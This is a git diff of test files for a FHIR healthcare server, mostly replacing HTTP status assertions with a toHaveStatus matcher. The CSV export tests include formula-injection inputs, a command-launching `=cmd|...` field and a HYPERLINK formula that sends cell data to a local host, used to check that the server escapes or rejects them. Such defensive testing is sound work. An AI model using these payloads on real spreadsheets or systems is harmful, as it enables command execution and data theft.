     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: expect.arrayContaining([
@@ -175,7 +175,7 @@ describe('CodeSystem lookup', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system: codeSystem.url, code: '1' } }],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -205,7 +205,7 @@ describe('CodeSystem lookup', () => {
           { name: 'code', valueCode: 'wrong code' },
         ],
       });
-    expect(res.status).toStrictEqual(404);
+    expect(res).toHaveStatus(404);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'not-found', details: { text: 'Not found' } }],
@@ -221,7 +221,7 @@ describe('CodeSystem lookup', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'code', valueCode: '1' }],
       });
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'invalid', details: { text: 'No code system specified' } }],
@@ -238,7 +238,7 @@ describe('CodeSystem lookup', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system: codeSystem.url, code: '1' } }],
       });
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'invalid', details: { text: `CodeSystem ${codeSystem.url} not found` } }],
@@ -256,7 +256,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(updatedCodeSystem);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     const codeSystem = res.body as CodeSystem;
 
     const res2 = await request(app)
@@ -270,7 +270,7 @@ describe('CodeSystem lookup', () => {
           { name: 'version', valueString: '3.1.4' },
         ],
       });
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -311,14 +311,14 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(completeCodeSystem);
-    expect(completeRes.status).toStrictEqual(201);
+    expect(completeRes).toHaveStatus(201);
 
     const exampleRes = await request(app)
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(exampleCodeSystem);
-    expect(exampleRes.status).toStrictEqual(201);
+    expect(exampleRes).toHaveStatus(201);
 
     // A code that only exists in the "complete" CodeSystem should be found
     const foundRes = await request(app)
@@ -332,7 +332,7 @@ describe('CodeSystem lookup', () => {
           { name: 'code', valueCode: 'complete-only' },
         ],
       });
-    expect(foundRes.status).toStrictEqual(200);
+    expect(foundRes).toHaveStatus(200);
     expect(foundRes.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -354,7 +354,7 @@ describe('CodeSystem lookup', () => {
           { name: 'code', valueCode: 'example-only' },
         ],
       });
-    expect(notFoundRes.status).toStrictEqual(404);
+    expect(notFoundRes).toHaveStatus(404);
   });
 
   test('Excludes retired CodeSystem from selection', async () => {
@@ -371,7 +371,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(retiredCodeSystem);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
 
     // The retired CodeSystem should not be selected, so the lookup fails to find it
     const lookupRes = await request(app)
@@ -386,7 +386,7 @@ describe('CodeSystem lookup', () => {
         ],
       });
     // The retired CodeSystem is filtered out, so no CodeSystem is found for the URL (400)
-    expect(lookupRes.status).toStrictEqual(400);
+    expect(lookupRes).toHaveStatus(400);
   });
 
   test('GET endpoint', async () => {
@@ -395,7 +395,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -419,7 +419,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -443,7 +443,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(404);
+    expect(res).toHaveStatus(404);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'not-found', details: { text: 'Not found' } }],
@@ -459,7 +459,7 @@ describe('CodeSystem lookup', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { code: '1' } }],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -486,7 +486,7 @@ describe('CodeSystem lookup', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system: 'incorrect', code: '1' } }],
       });
-    expect(res.status).toStrictEqual(404);
+    expect(res).toHaveStatus(404);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'not-found', details: { text: 'Not found' } }],
@@ -535,7 +535,7 @@ describe('CodeSystem lookup', () => {
           },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app)
       .post(`/fhir/R4/CodeSystem/${codeSystem.id}/$lookup`)
@@ -545,7 +545,7 @@ describe('CodeSystem lookup', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'code', valueCode: '1' }],
       });
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: expect.arrayContaining([
@@ -618,7 +618,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: expect.arrayContaining([

--- a/packages/server/src/fhir/operations/codesystemvalidatecode.test.ts
+++ b/packages/server/src/fhir/operations/codesystemvalidatecode.test.ts
@@ -39,7 +39,7 @@ describe('CodeSystem validate-code', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(testCodeSystem);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     codeSystem = res.body;
 
     const res2 = await request(app)
@@ -68,7 +68,7 @@ describe('CodeSystem validate-code', () => {
           { name: 'concept', valueCoding: { code: '2', display: 'Biopsy of head' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   afterAll(async () => {
@@ -87,7 +87,7 @@ describe('CodeSystem validate-code', () => {
           { name: 'code', valueCode: '1' },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -106,7 +106,7 @@ describe('CodeSystem validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system: codeSystem.url, code: '1' } }],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -128,7 +128,7 @@ describe('CodeSystem validate-code', () => {
           { name: 'code', valueCode: 'wrong code' },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueBoolean: false }],
@@ -144,7 +144,7 @@ describe('CodeSystem validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'code', valueCode: 'wrong code' }],
       });
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'invalid', details: { text: 'No code system specified' } }],
@@ -161,7 +161,7 @@ describe('CodeSystem validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system: codeSystem.url, code: '1' } }],
       });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Falls back to validating system URL', async () => {
@@ -176,7 +176,7 @@ describe('CodeSystem validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system, code: '1' } }],
       });
-    expect(resY.status).toBe(200);
+    expect(resY).toHaveStatus(200);
     expect(resY.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueBoolean: true }],
@@ -194,7 +194,7 @@ describe('CodeSystem validate-code', () => {
           { name: 'coding', valueCoding: { system, code: '1' } },
         ],
       });
-    expect(resN.status).toBe(200);
+    expect(resN).toHaveStatus(200);
     expect(resN.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueBoolean: false }],
@@ -213,7 +213,7 @@ describe('CodeSystem validate-code', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(updatedCodeSystem);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     const codeSystem = res.body as CodeSystem;
 
     const res2 = await request(app)
@@ -227,7 +227,7 @@ describe('CodeSystem validate-code', () => {
           { name: 'version', valueString: '3.1.4' },
         ],
       });
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -243,7 +243,7 @@ describe('CodeSystem validate-code', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -259,7 +259,7 @@ describe('CodeSystem validate-code', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -275,7 +275,7 @@ describe('CodeSystem validate-code', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueBoolean: false }],
@@ -291,7 +291,7 @@ describe('CodeSystem validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { code: '1' } }],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -310,7 +310,7 @@ describe('CodeSystem validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system: 'incorrect', code: '1' } }],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueBoolean: false }],
@@ -329,7 +329,7 @@ describe('CodeSystem validate-code', () => {
           { name: 'displayLanguage', valueCode: 'fr' },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [

--- a/packages/server/src/fhir/operations/conceptmapimport.test.ts
+++ b/packages/server/src/fhir/operations/conceptmapimport.test.ts
@@ -257,7 +257,7 @@ describe('ConceptMap/$import', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const pool = getDatabasePool(DatabaseMode.READER);
 
@@ -309,7 +309,7 @@ describe('ConceptMap/$import', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Allows selecting ConceptMap by URL', async () => {
@@ -336,7 +336,7 @@ describe('ConceptMap/$import', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Requires ConceptMap to be specified', async () => {
@@ -356,7 +356,7 @@ describe('ConceptMap/$import', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [expect.objectContaining({ details: { text: 'ConceptMap to import into must be specified' } })],
@@ -387,7 +387,7 @@ describe('ConceptMap/$import', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -419,7 +419,7 @@ describe('ConceptMap/$import', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [expect.objectContaining({ details: { text: 'Source code for mapping is required' } })],

--- a/packages/server/src/fhir/operations/conceptmaptranslate.test.ts
+++ b/packages/server/src/fhir/operations/conceptmaptranslate.test.ts
@@ -64,7 +64,7 @@ describe('ConceptMap $translate', () => {
           },
         ],
       });
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     conceptMap = res.body as ConceptMap;
   });
 
@@ -91,7 +91,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: params,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const output = (res.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -146,7 +146,7 @@ describe('ConceptMap $translate', () => {
           { name: 'coding', valueCoding: { system, code } },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const output = (res.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -195,7 +195,7 @@ describe('ConceptMap $translate', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const output = (res.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -215,7 +215,7 @@ describe('ConceptMap $translate', () => {
           { name: 'coding', valueCoding: { system, code } },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const output = (res.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -271,7 +271,7 @@ describe('ConceptMap $translate', () => {
           { name: 'coding', valueCoding: { system, code } },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const output = (res.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -305,7 +305,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system, code: 'BAD' } }],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const output = (res.body as Parameters).parameter;
     expect(output).toHaveLength(1);
@@ -324,7 +324,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system, code } }],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
@@ -345,7 +345,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'code', valueCode: 'BAD' }],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
@@ -366,7 +366,7 @@ describe('ConceptMap $translate', () => {
           { name: 'code', valueCode: 'BAD' },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
@@ -388,7 +388,7 @@ describe('ConceptMap $translate', () => {
       .send({
         resourceType: 'Parameters',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
@@ -408,7 +408,7 @@ describe('ConceptMap $translate', () => {
           { name: 'coding', valueCoding: { system, code } },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
@@ -463,7 +463,7 @@ describe('ConceptMap $translate', () => {
           },
         ],
       });
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     conceptMap = res.body as ConceptMap;
 
     const res2 = await request(app)
@@ -474,7 +474,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system, code } }],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const output = (res2.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -521,7 +521,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'codeableConcept', valueCodeableConcept: { text: 'Nebulous concept' } }],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
@@ -562,7 +562,7 @@ describe('ConceptMap $translate', () => {
           },
         ],
       });
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     conceptMap = res.body as ConceptMap;
 
     const res2 = await request(app)
@@ -573,7 +573,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'codeableConcept', valueCodeableConcept: { coding: [{ code }] } }],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const output = (res2.body as Parameters).parameter;
     expect(output?.find((p) => p.name === 'result')?.valueBoolean).toStrictEqual(true);
@@ -610,7 +610,7 @@ describe('ConceptMap $translate', () => {
         sourceCanonical: 'http://example.com/labs',
         targetCanonical: 'http://example.com/loinc',
       });
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     conceptMap = res.body as ConceptMap;
 
     const res2 = await request(app)
@@ -621,7 +621,7 @@ describe('ConceptMap $translate', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system, code } }],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueBoolean: false }],

--- a/packages/server/src/fhir/operations/confirm.test.ts
+++ b/packages/server/src/fhir/operations/confirm.test.ts
@@ -80,7 +80,7 @@ describe('Appointment/:id/$confirm', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
   });
 
   test('Succeeds for a proposed appointment', async () => {
@@ -99,7 +99,7 @@ describe('Appointment/:id/$confirm', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
   });
 
   test('Returns a Bundle containing the booked Appointment', async () => {
@@ -110,7 +110,7 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const bundle = response.body as Bundle;
     const entries = (bundle.entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -128,7 +128,7 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const bundle = response.body as Bundle;
     const entries = (bundle.entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -146,7 +146,7 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const bundle = response.body as Bundle;
     const entries = (bundle.entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -163,7 +163,7 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const persisted = await systemRepo.readResource<Slot>('Slot', slot.id);
     expect(persisted.status).toEqual('busy');
@@ -177,7 +177,7 @@ describe('Appointment/:id/$confirm', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
   });
 
   test.each(['booked', 'cancelled', 'fulfilled', 'noshow', 'entered-in-error'] as Appointment['status'][])(
@@ -198,7 +198,7 @@ describe('Appointment/:id/$confirm', () => {
           },
         ],
       });
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
     }
   );
 
@@ -207,7 +207,7 @@ describe('Appointment/:id/$confirm', () => {
       .post('/fhir/R4/Appointment/00000000-0000-0000-0000-000000000000/$confirm')
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(404);
+    expect(response).toHaveStatus(404);
   });
 
   test('Returns 400 when a referenced slot does not exist', async () => {
@@ -225,7 +225,7 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', details: { text: 'Loading slots failed' } }],

--- a/packages/server/src/fhir/operations/confirm.test.ts
+++ b/packages/server/src/fhir/operations/confirm.test.ts
@@ -79,7 +79,6 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
   });
 
@@ -98,7 +97,6 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
   });
 
@@ -176,7 +174,6 @@ describe('Appointment/:id/$confirm', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$confirm`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
   });
 

--- a/packages/server/src/fhir/operations/csv.test.ts
+++ b/packages/server/src/fhir/operations/csv.test.ts
@@ -57,7 +57,7 @@ describe('CSV Export', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Also create an empty patient to make sure we handle missing values
     const res2 = await request(app)
@@ -67,12 +67,12 @@ describe('CSV Export', () => {
       .send({
         resourceType: 'Patient',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(`/fhir/R4/Patient/$csv?_fields=id,name,address,email,phone`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toContain(res1.body.id);
     expect(res3.text).toContain(res2.body.id);
     expect(res3.text).toContain('123 Main St');
@@ -111,12 +111,12 @@ describe('CSV Export', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(serviceRequest);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(`/fhir/R4/ServiceRequest/$csv?_fields=id,subject,code,orderDetail`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toContain(res1.body.id);
     expect(res3.text).toContain('Alice Smith');
     expect(res3.text).toContain('test1');
@@ -153,14 +153,14 @@ describe('CSV Export', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(serviceRequest);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(
         `/fhir/R4/ServiceRequest/$csv?_fields=id,subject,code,orderDetail&subject=${serviceRequest.subject?.reference}`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toContain(res1.body.id);
     expect(res3.text).toContain('Alice Smith');
     expect(res3.text).toContain('Shipped');
@@ -171,14 +171,14 @@ describe('CSV Export', () => {
     const res = await request(app)
       .get(`/fhir/R4/Patientx/$csv`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Invalid query string param', async () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/$csv?_count=20&_fields=id,_lastUpdated,=cmd|'/C%20calc'!A0&_offset=0&_sort=-_lastUpdated`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Invalid FHIRPath expression');
   });
 
@@ -192,12 +192,12 @@ describe('CSV Export', () => {
         resourceType: 'Patient',
         gender: '=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(`/fhir/R4/Patient/$csv?_fields=id,gender`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toContain(res1.body.id);
 
     // Note the escaped quotes and single quote prefix

--- a/packages/server/src/fhir/operations/custom.test.ts
+++ b/packages/server/src/fhir/operations/custom.test.ts
@@ -57,14 +57,14 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient/$missing-extension')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(404);
+    expect(res2).toHaveStatus(404);
   });
 
   test('Extension is not a bot', async () => {
@@ -107,14 +107,14 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post('/fhir/R4/Patient/$not-a-bot')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res4.status).toBe(404);
+    expect(res4).toHaveStatus(404);
   });
 
   test('Success', async () => {
@@ -127,7 +127,7 @@ describe('Custom operation', () => {
         name: 'Custom Operation Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as WithId<Bot>;
 
@@ -148,7 +148,7 @@ describe('Custom operation', () => {
           };
           `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .post('/fhir/R4/OperationDefinition')
@@ -186,14 +186,14 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post('/fhir/R4/Patient/$my-custom-operation')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toBe('Patient');
     expect(res4.body.identifier).toBeDefined();
     expect(res4.body.identifier.length).toBe(1);
